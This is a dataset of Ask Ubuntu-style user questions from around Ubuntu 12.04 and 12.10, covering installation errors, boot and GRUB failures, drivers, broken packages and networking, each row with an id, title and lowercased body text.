261111	error while installing applications - `` an error occurred while loading the archive . ''	i 'm a complete novice to ubuntu and like it a lot from first impression but i have n't gotten very far since getting it up and running several days ago . i loaded 12.10 on an old e-machine that someone threw in the trash and everything seems to be running ok except when i go to install any software ( whether cd or downloaded from the internet ) i get the following message : an error occurred while loading the archive .
261114	libreoffice not starting ( with no errors ! )	i 'm trying to start libreoffice from launcher or terminal , but it just does n't show up ! the weird thing is that it does n't show any errors or something , and it has an exit code of 0 . and i do n't know why , but it will start if with superuser permission ! !
261117	problems with firefox gedit ( default )	i 'm new to ubuntu so i not too familiar with this operating system yet . i 'm trying to download a file off the internet using firefox . firefox ask what i want to open with and it is set as gedit ( default ) and i tried looking for transmission to set that as my default but ca n't find it . i have transmission lock on my launcher but ca n't find it when trying to set as my default for opening files on firefox . can someone please point me in the right direction ?
261118	unable to login ubuntu . how can i recover it ?	i was trying to setup and ssh server with chrooted and after getting tired of no results and permission issue i ran the following command resulting in a screen that as soon as i enter my user and password revert back to the login screen , sudo chown root : root / sudo chmod 750 / is there any way without having to reinstall it to solve this ?
261119	libgl.so.1 is missing after changing graphics card - unable to run steam	since my graphics driver update failed and ubuntu 12.04 64bit could n't load the driver , and i changed to use the on-board graphics hardware , steam is n't able to start . it just tells me : you are missing the following 32-bit libraries , and steam may not run : libgl.so.1 when i then click ok its says : fatal error : failed to load steamui.so can anyone help me ? any idea how i can get this lib back ? edit it seems i already have this lib , .. locate libglu.so.1 /home/sebastian/.local/share/steam/ubuntu12_32/steam-runtime/i386/usr/lib/i386-linux-gnu/libglu.so.1 /home/sebastian/.local/share/steam/ubuntu12_32/steam-runtime/i386/usr/lib/i386-linux-gnu/libglu.so.1.3.08004 /home/sebastian/.local/share/steam/ubuntu12_32/steam-runtime.old/i386/usr/lib/i386-linux-gnu/libglu.so.1 /home/sebastian/.local/share/steam/ubuntu12_32/steam-runtime.old/i386/usr/lib/i386-linux-gnu/libglu.so.1.3.08004 /usr/lib/i386-linux-gnu/libglu.so.1 /usr/lib/i386-linux-gnu/libglu.so.1.3.08004 /usr/lib/x86_64-linux-gnu/libglu.so.1 /usr/lib/x86_64-linux-gnu/libglu.so.1.3.08004
261122	how to reset monitor settings to default through terminal ?	i have a tricky problem regarding multiple monitors on kde ( kubuntu ) . i have a laptop which , at home , is connected to two monitors - vga and hdmi . that works only when the built-in laptop display is disabled ( at least i was told that ) . the problem is that now i took the laptop away and booted it up with no external monitors connected . the system remembers that the built-in display was disabled , so it disables it even though it is the only monitor connected . obviously , that makes the laptop pretty much unusable . switching to a terminal through ctrl+alt+f # works , i can login ; even guest works normally . the question is , how do i ( re ) set an account 's monitor settings through terminals , since i ca n't use the gui ? thanks
261123	unity switcher theme	is it possible to modify the unity switcher theme and behavior ? namely : no 3d `` rolling '' and no icon borders . i love the gnome-shell 's , but unity is better for me . are there any 3rd party switchers ? i need it to group my apps ( like both unity and gnome-shell do ) and that 's pretty much it . images taken from http : //www.bohemianalps.com/blog/2011/how-to-switch-from-unity-to-gnome-3-on-ubuntu-11-10/ , thanks .
261126	how to use pam to restrict http access for some users ?	i 've read that pam can be used to restrict http access for some users , but i ca n't figure out how to do it in ubuntu 12.04 . the /etc/security/time.conf man page contains this example : all users except for root are denied access to console-login at all times : login ; tty* & ! ttyp* ; ! root ; ! al0000-2400 for this to work , /etc/pam.d/login needs to have a line account requisite pam_time.so this example works , and i tried to adapt it to limit http access from the console . i added http ; tty* & ! ttyp* ; ! root ; ! al0000-2400 to /etc/security/time.conf , and created /etc/pam.d/http with account requisite pam_time.so this does n't work . i can still use wget as non-root from the console .
261128	why are the positions of the windows of the same application in a birdview not fixed ?	suppose you have opened several windows of an application , such as opened several pdf files using evince . then the windows will cluster in the icon of the application on the left panel of the desktop . when clicking the application icon , a birdview of all the windows will be shown , and you can click any window in the birdview to restore that window and switch the current focus to that window . but when there are more and more windows opened for an application , each window in the birdview will be smaller and harder to be seen clearly of what it is about , which makes selecting the desired window more difficult . there is another thing adding to the difficulty . when you go back and forth between clicking application icon to see the birdview of multiple windows and selecting one window from the birdview , the order of the windows in the birdview will change from time to time when you click to see the birdview . if you happen to choose the wrong window from the birdview and then go back to birdview , you will be unable to choose a different window , because the ordering of the windows in the birdview has been changed and each window is so small to see its content . so i was wondering how the ordering of multiple windows of an application in the birdview changes from time to time ? can i request the developer of the desktop of ubuntu to fix the ordering of windows in the birdview , and also to find a way to make each window larger to see in the birdview ? my ubuntu is 12.04 . thanks !
261132	how can i get compaq presario v2565us graphics driver ?	i 'm new to ubuntu and after i installed ubuntu 12.10 i found that my graphics driver is unknown . could anyone please tell me the solution ?
261139	counter strike 1.6 on ubuntu 12.04	i wish to install counter-strike 1.6 on ubuntu 12.04 under wine but i do n't know where to get the source ( i 've exe setup file ) and how to run it under wine . i will connect to international servers using ip . please , give me step by step instructions where to download source and how to run it under wine . i 'm fairly new to linux . thanks in advance for your help !
261140	clone encrypted hdd to smaller drive	for my work laptop i use full hdd encryption and i need to upgrade my 500gb hdd to a 250 ssd drive , my hdd has only around 100gb of data and is created via encrypted lvm . gparted does not support luks encryption , so i am unable to copy ( or resize ) partitions . using dd would be great but because of the different size i might loos data . then only valid option i got so far is to try and re-size the partition and then try a clone with dd ( but seems very complicated and prone to failure ) . there is any other way to clone the data on the hdd without reinstalling ? based on what i have read so far i think reinstalling would be the easiest and fastest solution , but i would like to see your ideas/opinion . thank you
261142	ubuntu lts as a fileserver with samba4 pdc	i am a die hard debian fan when it comes to servers , however , the 5 year lts support and the ability to install fresh packages such as samba4 on a server environment sounds very tempting . how reliable would that be though ? mainly specd for small businesses , 50 users max .
261146	my amd/ati hd 7570m is overheating after install ubuntu 12.04.2	i get the last ubuntu version to install in my inspiron 14z , but after install it , the video card is overheating , the battery is get down too fast . can someone help me to solve this problem ?
261149	cant install or boot from ubuntu 12.10 dvd	i burned two ubuntu 12.10 amd64 images : one from the official site , the other one is ubuntu secure remix they both did not work because when i hit enter on either `` try without installing '' or `` install ubuntu '' the monitor turns into the black screen with a flashing underscore cursor in the top-left corner and freezes . my computer is an asus g75vw laptop with i7 processor and gtx 660m . i am trying to dual boot ubuntu with windows 7 pro 64bits . thanks in advance ! edit : i have done the checksum by this instruction . the sum are the same .
261153	invaild efi file path - ca n't boot into windows 8	i have installed ubuntu on my lenovo ideapad y580 ( with win 8 ) ubuntu works great , but when i use grub to select windows , error ca n't find commend 'drivemap' invaild efi file path what does it mean ? how do i fix this and use windows 8 ?
261159	where is the api for ubuntu touch ?	i 'm sure this has been asked before , but is there any api for ubuntu mobile available ? i ca n't seem to find it on ubuntu-api
261161	wubi install , lost home folder , recovery options ?	i have been running ubuntu for over a year on my laptop and i 've really come to enjoy it . so much that it has replaced windows in my day-to-day activities . yesterday an error occurred on my desktop version of 12.04 that caused it to fail to boot . in the process , i lost the contents of my home folder despite creating a back up of the home folder . here is the time line : feb 18 , 2013 - installed ubuntu 12.04 lts on desktop via wubi . the install went as advertised and i proceeded to apply personal tweaks to make both the laptop and the desktop essentially the same . everything functioned normally . feb 19-23 - began moving files from the laptop to the desktop in an effort to centralize my own files . the intent was to use dropbox as a sort of `` briefcase '' , and use the laptop when i needed to be mobile . feb 24 - everything functioned normally through the day . i switched to windows to continue sending things to dropbox as i could not see any of the ubuntu folders in my windows explorer . as this was my first dual boot experience , i assumed this was normal . while in windows , the hp desktop assistant informed me it needed to do system maintenance ( i use windows only for ms flight sim - it is infrequent ) . i delayed it by one hour . system did not ask me again , and i assume it went ahead and did what it needed to do while files were being moved to dropbox . system failed to boot 12.04 . internet research lead me to believe the grub2 had somehow become corrupt ( possibly during the above windows maintenance ) . at this time i created a bootable usb using unetbootin . this gained access to a terminal where i ran `` boot-repair '' . boot repair found an issue and advised me to back up my files . i proceeded to put the contents of my home folder on another usb . after this process had completed , the system became unresponsive - i could not double check that the files had actually moved . i believed i had enough evidence that the transfer had taken place , i opted to remove wubi , and do a true dual boot of ubuntu in its own partition , hoping this would prevent this error from happening again . when that had completed , i found the usb contained only the folders within my home folder from the previous wubi install . i have run photorec , as suggested below . it recovered fragments of files , but not a whole file . i suspect this occurred when i attempted another wubi install in the hopes that it would locate my old home folder ( this was done prior to asking for help from ask ubuntu ) . i am still seeking solution , but i believe the contents of my previous home folder are now unrecoverable . i 'm running ubuntu 12.04 on its own partition ( now ) , 64 bit windows 7 is on the other partition ( where the wubi install was ) if any other details will be helpful , i 'll be glad to provide . also , i 'm not afraid of the command line . edit this question can be closed . user bcbc gave the best answer in another forum : http : //ubuntuforums.org/showthread.php ? t=2065355 if the home folder is lost during a wubi uninstall ( as mine was ) then it is gone . i believe it would have been recoverable had i not attempted another wubi install this morning ( prior to asking the above question ) prior to running programs that can recover deleted data . tough lesson to learn . thank you to those who took the time to help out .
261169	who is starting xbindkeys ?	when i restart my computer , xbindkeys is launched but it does n't work right . if i kill it and then manually start it with nohup xbindkeys , it works fine . i think it 'll work fine if i put it into my .xsessionrc file . but something else is already starting it when i boot , which interferes . i recursively searched /etc for xbindkeys with no success .
261174	is it possible to make a file that has full permissions for everybody but is impossible to delete ?	without using sudo , preferably ?
261177	how do i install python in wine ? i keep getting an error	please help ! i 've been searching google , forums , and have yet to find a solution . here is the output from my terminal : 2013-02-25 12:57:05 ( 1.01 mb/s ) - `pywin32-214.win32-py2.6.exe ' saved [ 6438204/6438204 ] executing wine msiexec /i python-2.6.2.msi allusers=1 fixme : storage : create_storagefile storage share mode not implemented . fixme : sxs : cache_queryassemblyinfo 0x3ec1c8 , 0x00000002 , l '' microsoft.vc90.crt , version=\ '' 9.0.21022.8\ '' , publickeytoken=\ '' 1fc8b3b9a1e18e3b\ '' , processorarchitecture=\ '' x86\ '' , type=\ '' win32\ '' '' , 0x32f978 fixme : sxs : cache_queryassemblyinfo 0x3ec1c8 , 0x00000002 , l '' policy.9.0.microsoft.vc90.crt , version=\ '' 9.0.21022.8\ '' , publickeytoken=\ '' 1fc8b3b9a1e18e3b\ '' , processorarchitecture=\ '' x86\ '' , type=\ '' win32-policy\ '' '' , 0x32f978 fixme : msi : controlevent_spawnwaitdialog doing nothing err : msi : action_installfiles compressed file was n't installed ( l '' c : \\python26\\lib\\test\\readme.txt '' ) err : msi : iterate_actions execution halted , action l '' installfiles '' returned 1603 err : msi : iterate_actions execution halted , action l '' executeaction '' returned 1603 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- note : command 'wine msiexec /i python-2.6.2.msi allusers=1 ' returned status 67 . aborting .
261181	after resuming my laptop it is unlocked for a while before locking	when i close my laptop lid and it is suspended , when i open it again it is resumed but without showing the lock screen which is set to come up . it resumes with access to web pages or programs that were left open . i can use my laptop to continue with what i had open for between a few seconds to about half a minute at which point the lock screen will come up . i would much prefer it if the lock screen would show when the lid is opened . my laptop is a zoostorm freedom 10-270 netbook , with intel atom n270 ( 1.6ghz ) . it is running ubuntu 12.10 .
261182	dual booting windows and ubuntu , ubuntu wo n't load . grub help	i installed ubuntu using wubi . it has been working fine for the past 5 months , but i tried to boot it recently and instead of loading ubuntu i get the grub terminal . what commands do i need to enter so i can load/boot ubuntu ? thanks !
261187	12.10 wo n't allow windows partition to boot	i upgraded to 12.04.2 and my windows partition would n't boot any more . i tried 12.10 and i still have the same problem . here is the url generated when boot repair attempted fixing the issue . it seems the boot location is different from what it should be . i do n't know how to fix it . http : //paste.ubuntu.com/5565425 please help if you know the solution .
261190	is it possible to install older wine releases ?	one application i used to use with wine stopped working . i suspect something in wine has changed and so the application no longer works . is it possibel to install earlier versions of wine in ubuntu ? are there some repositories , or would i have t ocompile by hand ?
261193	error message when entering iptables command ( table does not exist )	i have been trying to install spotify , but when logging in i get a message saying i have an error 101 . this appears to be related to either my proxy settings or to my firewall . following instructions from another similar question i 've entered the following into a terminal iptables -l and it has returned this message which sounds a bit worrying ! fatal : error inserting ip_tables ( /lib/modules/3.5.0-25-generic/kernel/net/ipv4/netfilter/ip_tables.ko ) : operation not permitted iptables v1.4.12 : ca n't initialize iptables table `filter ' : table does not exist ( do you need to insmod ? ) perhaps iptables or your kernel needs to be upgraded . any idea 's what the solution is to both my apparent lack of firewall and to solving my ability to get into spotify ?
261195	how can i save my laptops battery from draining ?	i am using ubuntu 12.04 ( switched from windows 8 recently ) and i am finding that this os is draining my laptops battery like anything ( works only like 70 % of windows ) . i also found this interesting quote from wikipedia : ubuntu 10.04 lts has also been criticized for its poor battery life on laptops and netbooks , even as oem on devices such as asus 's eeepc , when compared to microsoft windows 7 , with ubuntu having been shown to use between 14â56 % more power . [ 122 ] ubuntu 's developers have acknowledged and sought to solve the issues of power consumption in the 12.04 lts release . can ubuntu experts suggest me some tips and tricks to save my battery life ? also tell me how can i monitor my battery usage , like which application/process is more resource ( power ) consumptive ? is there any way we can select system performance schemes like we do in windows like high performance or battery saver types ? i also see a problem with my ubuntu display brightness setting . i manually set it to lowest possible but ubuntu forgets my setting everytime i reboot my machine . is there any way we can permanently save this setting and ubuntu can remember it ?
261196	is it important which comes first , root or swap partition on my external drive ?	i am trying to creat root , swap and home partition in order to install ubuntu onto my external hard drive.i use the program called gparted . but some people say first section must be root , other say swap on disk.. which one is true ? thanks
261202	block outgoing internet calls from inside a container	this question is not similar to my earlier post . this is pretty simple i think , i just do n't know enough about networking and the ubuntu firewall . i followed this article and setup a linux container inside my ubuntu server on ec2 . i can access the internet from my container . | -- -- ubuntu server on ec2 -- -- - ==== internet < ==== > | some magic routes traffic < === lxc container | [ 192.168.3.1 ] | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i needed the internet inside the container only to install dependencies for my app . now i need to shut off internet access . i would n't mind any other approach like prevent a certain user account from the internet . this is how the network config goes , any ideas , clues or suggestions on what i should read will be appreciated : there is a network bridge : brctl addbr br0 brctl setfd br0 0 ifconfig br0 192.168.3.1 up then i did this : iptables -t nat -a postrouting -o eth0 -j masquerade sysctl -w net.ipv4.ip_forward=1 then this : cat /etc/dnsmasq.conf domain-needed bogus-priv interface = br0 listen-address = 127.0.0.1 listen-address = 192.168.3.1 expand-hosts domain = containers dhcp-range = 192.168.3.50,192.168.3.200,1h then : cat etc/dhcp3/dhclient.conf prepend domain-name-servers 127.0.0.1 ; prepend domain-search `` containers . `` ; then i ran : dhclient -e if_metric=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
261206	installing ubuntu along side windows	how can i install ubuntu along side my windows 7 os without wubi ? i am trying to put ubuntu on its own partition . i have already shrunk my c drive and have a u drive of 140 gb for ubuntu .
261207	how to find exact file without listing folders	my current folder is the top of the folder tree structure somewhere inside i have an *.rpm file . how do i find that *.rpm file in a way that 'll list only its full path when found and not list every folder it searches recursively ?
261210	i have issues connecting to internet in ubuntu 12.10	i am dual booting windows 8 and ubuntu 12.10 . it ca n't connect to the internet on ubuntu 12.10 . i have not had any way to update anything for it to try and connect it . it would be nice if i could connect , because i need it for my schooling .
261216	upgrading ubuntu from 10.04 to 12.04	i 'm trying to update ubuntu from 10.04 to 12.04 on an acer aspire laptop pc . unfortunately i started the process another time , and was forced to abort ... kindah wish i did n't do that now ... now update manager says i need to run a partial upgrade because a previous upgrade did n't complete . when i run this , it tells me the system contains broken packages and to try using apt-get or synaptic before proceeding . i ran sudo apt-get update and it works fine , but sudo apt-get upgrade returns : reading package lists ... done building dependency tree reading state information ... done you might want to run `apt-get -f install ' to correct these . the following packages have unmet dependencies : libc-dev-bin : depends : libc6 ( < 2.12 ) but 2.15-0ubuntu10.3 is installed libc6-dev : depends : libc6 ( = 2.11.1-0ubuntu7.10 ) but 2.15-0ubuntu10.3 is installed libgssapi-krb5-2 : depends : libkrb5-3 ( = 1.10+dfsg~beta1-2ubuntu0.3 ) but 1.8.1+dfsg-2ubuntu0.10 is installed libkrb5-3 : depends : libkrb5support0 ( = 1.8.1+dfsg-2ubuntu0.10 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed libnih1 : depends : libc6 ( < 2.12 ) but 2.15-0ubuntu10.3 is installed python-louis : depends : liblouis0 ( > = 1.7.0-2 ) but it is not installable e : unmet dependencies . try using -f. so i tried sudo apt-get -f install and this is what it told me : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libc-dev-bin : depends : libc6 ( < 2.12 ) but 2.15-0ubuntu10.3 is installed libc6-dev : depends : libc6 ( = 2.11.1-0ubuntu7.10 ) but 2.15-0ubuntu10.3 is installed libgssapi-krb5-2 : depends : libkrb5-3 ( = 1.10+dfsg~beta1-2ubuntu0.3 ) but 1.8.1+dfsg-2ubuntu0.10 is installed libkrb5-3 : depends : libkrb5support0 ( = 1.8.1+dfsg-2ubuntu0.10 ) but 1.10+dfsg~beta1-2ubuntu0.3 is installed libnih1 : depends : libc6 ( < 2.12 ) but 2.15-0ubuntu10.3 is installed python-louis : depends : liblouis0 ( > = 1.7.0-2 ) but it is not installable e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies which brings me to the question : what are held packages ? anyway , i tried synaptic package manager next . first thing , it said you have 7 broken packages on your system ! use the `` broken '' filter to locate them . these are the packages that show up ( just six ) : libc-dev-bin libc6-dev libcssapi-krb5-2 libkrb5-3 libnih1 python-louis i marked those for removal , but when i try to apply it tells me 3 essential packages are marked for removal ( none of which i marked myself , btw ) : e2fsprogs hostname util-linux so i unmarked those and tried to apply , but : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . * [ several times ! ] * e : unable to correct dependencies e : unable to lock the download directory i also tried using sudo do-release-upgrade , but it returned this : investigating network-manager package network-manager has broken depends on libnm-glib4 considering libnm-glib4 0 as a solution to network-manager 3 holding back network-manager rather than change libnm-glib4 investigating gnome-games package gnome-games has broken depends on glchess considering glchess 1 as a solution to gnome-games 0 holding back gnome-games rather than change glchess done broken packages your system contains broken packages that could n't be fixed with this software . please fix them first using synaptic or apt-get before proceeding . preparing the upgrade failed preparing the system for the upgrade failed so a bug reporting process is being started . === command terminated with exit status 1 ( mon feb 25 18:07:53 2013 ) === it might also be worth mentioning i initially tried using an iso-imaged disk , but that did n't give me the usual set of choices ( like 'try ubuntu 12.04 ' , 'upgrade to ubuntu 12.04 ' etc. ) . instead , the screen kept changing 'shades ' of black , producing nothing ... i know the disk works because i 've used once before . i 'm not much of linux expert - is there something i 'm overlooking ? how can i perform this upgrade ? i 'm even willing o clear the computer 's hdd if necessary . thanks al lot !
261220	ubuntu unresponsive to peripheral devices	i 'm using ubuntu 12.04 and after running for awhile , the display dissappears and the computer ignores input from the keyboard and mouse . even pressing the numlock key does not change the lighting on the keyboard . however , i 'm still able to ssh and login remotely . this condition occurs usually after running mathematica for awhile eventhough i do n't have a clue why that should happen . the computer is supercomputer with 4 xeon processors and a tesla gpu . thanks .
261225	`` installation type '' options	i am trying to install ubuntu onto my external drive via liveusb.i created three parts called root , swap and home by using gparted.now it time to install ubuntu .i came to `` installation type '' window.i can see the partitions i have created.i chose my external disk as a `` device for boot loader installation '' but what makes me confused is that do i have to creat another partition here ? when i clicked sdc1/ext4 and clicked `` change '' icon i see that it says `` dont use the partition '' is it ok ? should i change it ? and which part should be highlighted when i clicked `` install '' ? dev/sdc or dev/sdc1 or dev/sdc2 or dev/sdc3 thanks
261226	weird underlining in kate	i 've looked everywhere for a fix , but ca n't seem to find a way to fix this problem , or even anyone else with it . whenever i run kate , i get weird underlining ( which breaks easily becoming blurry , etc . if i scroll/resize the window , only redrawing when i minimize and then maximize the window ) . any other user , including root ( using kdesudo kate ) does n't have this problem . i have tried removing kate config files in my home directory to no avail , although every setting was reset . i have also tried enabling and disabling everything in the settings to . no other app/user has this problem . the font settings do not have any 'underline ' checkbox checked ( and i 've reset them to no avail even then ) . this is on a 3-day old install of kubuntu 12.10 . the problem started the second time i used kate , and has remained since ... thanks for any help !
261230	unmet dependencies : linux-generic	today i went over to my grandma because she had some problems with her computer , running xubuntu 12.04lts . after fixing 'the problem ' ( firefox was set fullscreen.. ) i ran the usual apt-get update & & apt-get dist-upgrade to immediately update everything . instead i was greeted by an error that some packages where not correctly installed . so i ran dpkg -- configure -a . my guess is that , because firefox was fullscreen , she could n't figure out how to turn of her computer and had simply turned it of , probably at the exact moment when it was installing automatic security updates . running dpkg -- configure -a however only left me with an error message about unmet dependencies for linux-generic . when running apt-get dist-upgrade again , it told me the same and i should try the -f option . however , even while trying to force the upgrade it still wont install them . this is the output from the commands ( added lang=c because default language is dutch ) . jeroen @ bomma : /home/bomma $ lang=c sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-generic : depends : linux-image-generic ( = 3.2.0.37.45 ) but 3.2.0.38.46 is installed depends : linux-headers-generic ( = 3.2.0.37.45 ) but 3.2.0.38.46 is installed e : unmet dependencies . try using -f. running it with -f : jeroen @ bomma : /home/bomma $ lang=c sudo apt-get -f dist-upgrade reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done calculating upgrade ... done the following packages will be upgraded : linux-generic 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/1.722 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.37.45 ) ; however : version of linux-image-generic on system is 3.2.0.38.46. linux-generic depends on linux-headers-generic ( = 3.2.0.37.45 ) ; however : version of linux-headers-generic on system is 3.2.0.38.46. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm out of ideas on how to solve this ( other than quickly reinstalling her pretty default xubuntu ) ? trying to remove and reinstall the linux-generic package seems rather risky , but maybe that would solve it ?
261231	ubuntu blackscreen while installation	i am trying to install ubuntu for hours . i have an asus ux32vd . i followed these guides . but no matter what i always get a black screen . i googled this problem but the solution with nomodeset does n't work for me . ( my computer boots to a black screen , what options do i have to fix it ? and problem installing ubuntu 12.10 ) i replaced splash with nomodeset while pressing e on `` try ubuntu without installing '' . then i pressed f10 . i also tried this ubuntu install black screen - nomodeset not working but it seems we have exactly the same issue i downloaded 12.04 and 12.10 64bit . i currently have installed fedora on a gpt partiton . i `` broke '' it because i installed nvidia drivers and now it did n't boot to a gui anymore . i thought i give ubuntu a try . i mounted my usb stick with several different tools . unetbootin and win32diskmanager . any other ideas that i can try ?
261232	how to solve wireless issue in 12.10 in lg n460-p.bg55p1	i 've just removed the freaking windows 8 from my lg n460-p.g55p1 ( which came with it ) and installed ubuntu 12.10 32bits ... you see , the thing is that i discovered later that my laptop came with a problematic ethernet adaptor called atheros ar8161 . i 've been throught this issue for a while , because my laptop even refused to detect wired connection . i searched a little and i came to find a package that solved the wired connection problem . but now the network manager simply do n't show any sign of detecting a wifi component . i 'm a begginer , so , after 3h searching and trying some stuff on it , i thing its time to ask for some help ... here some stuff that might help you guys : here 's lspci -nn : root @ bernardo-ubuntu : /home/bernardo # lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm77 express chipset lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 7 series/c210 series chipset family thermal management controller [ 8086:1e24 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] [ 1002:6841 ] 07:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:8723 ] 08:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) here 's nm-tool : root @ bernardo-ubuntu : /home/bernardo # nm-tool networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : alx state : unavailable default : no hw address : 00 : e0:91:4e : a7 : ff capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off here 's ifconfig -a root @ bernardo-ubuntu : /home/bernardo # ifconfig -a eth0 link encap : ethernet hwaddr 00 : e0:91:4e : a7 : ff up broadcast multicast mtu:1500 metric:1 rx packets:523 errors:0 dropped:0 overruns:0 frame:0 tx packets:35 errors:0 dropped:0 overruns:0 carrier:2 collisions:0 txqueuelen:1000 rx bytes:47559 ( 47.5 kb ) tx bytes:7912 ( 7.9 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1624 errors:0 dropped:0 overruns:0 frame:0 tx packets:1624 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:131440 ( 131.4 kb ) tx bytes:131440 ( 131.4 kb ) here 's lshw -c network root @ bernardo-ubuntu : /home/bernardo # lshw -c network *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:4000 ( size=256 ) memory : c3500000-c3503fff *-network description : ethernet interface product : ar8161 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 10 serial : 00 : e0:91:4e : a7 : ff capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx firmware=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : c3400000-c343ffff ioport:3000 ( size=128 ) heres rfkill list : root @ bernardo-ubuntu : /home/bernardo # rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no i guess that 's all i have ... what can i say ... ? help me ! t.t
261235	how do i replace the system sounds ?	i have in /usr/share/sounds/ubuntu/stereo lots of sounds for different actions . none of them are working . in system settings -- > sound i ca n't choose much in configuration . can you help me to replace those drum system sounds ( log in , minimize window , log out etc . ) with my own sounds ? thank you .
261247	minimize windows without them going black and white	i recently updated to kde 4.10 . now when i minimize windows , the task manager shows them being black and white . i find this very annoying since i tend to find windows primarily based on colors , not based on the shape of their icon . it takes me usually at least twice as long to find the window i 'm looking for now because of this . is there any way to switch it back to previous behavior where minimized windows would still have color in the task manager ? this is what it looks like now . firefox is minimized while the system settings window is not . it 's usually quite easy to spot a bright orange and blue icon . not so here :
261250	dpkg : invoke-rc.d : initscript mysql , action `` start '' failed	i have read a number of the posts here and they all state to run the following commands : apt-get -f remove ** apt-get update apt-get upgrade apt-get -f install ** i have seen these in various order etc , and none are resolving , my issue . no matter what i try i get : apt-get -f install mysql-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : mysql-server-5.5 mysql-server-core-5.5 suggested packages : tinyca mailx the following new packages will be installed : mysql-server mysql-server-5.5 mysql-server-core-5.5 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/14.9 mb of archives . after this operation , 53.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... selecting previously unselected package mysql-server-core-5.5 . ( reading database ... 83134 files and directories currently installed . ) unpacking mysql-server-core-5.5 ( from ... /mysql-server-core-5.5_5.5.29- 0ubuntu0.12.04.1_amd64.deb ) ... selecting previously unselected package mysql-server-5.5 . unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.29-0ubuntu0.12.04.1_amd64.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.29-0ubuntu0.12.04.1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up mysql-server-5.5 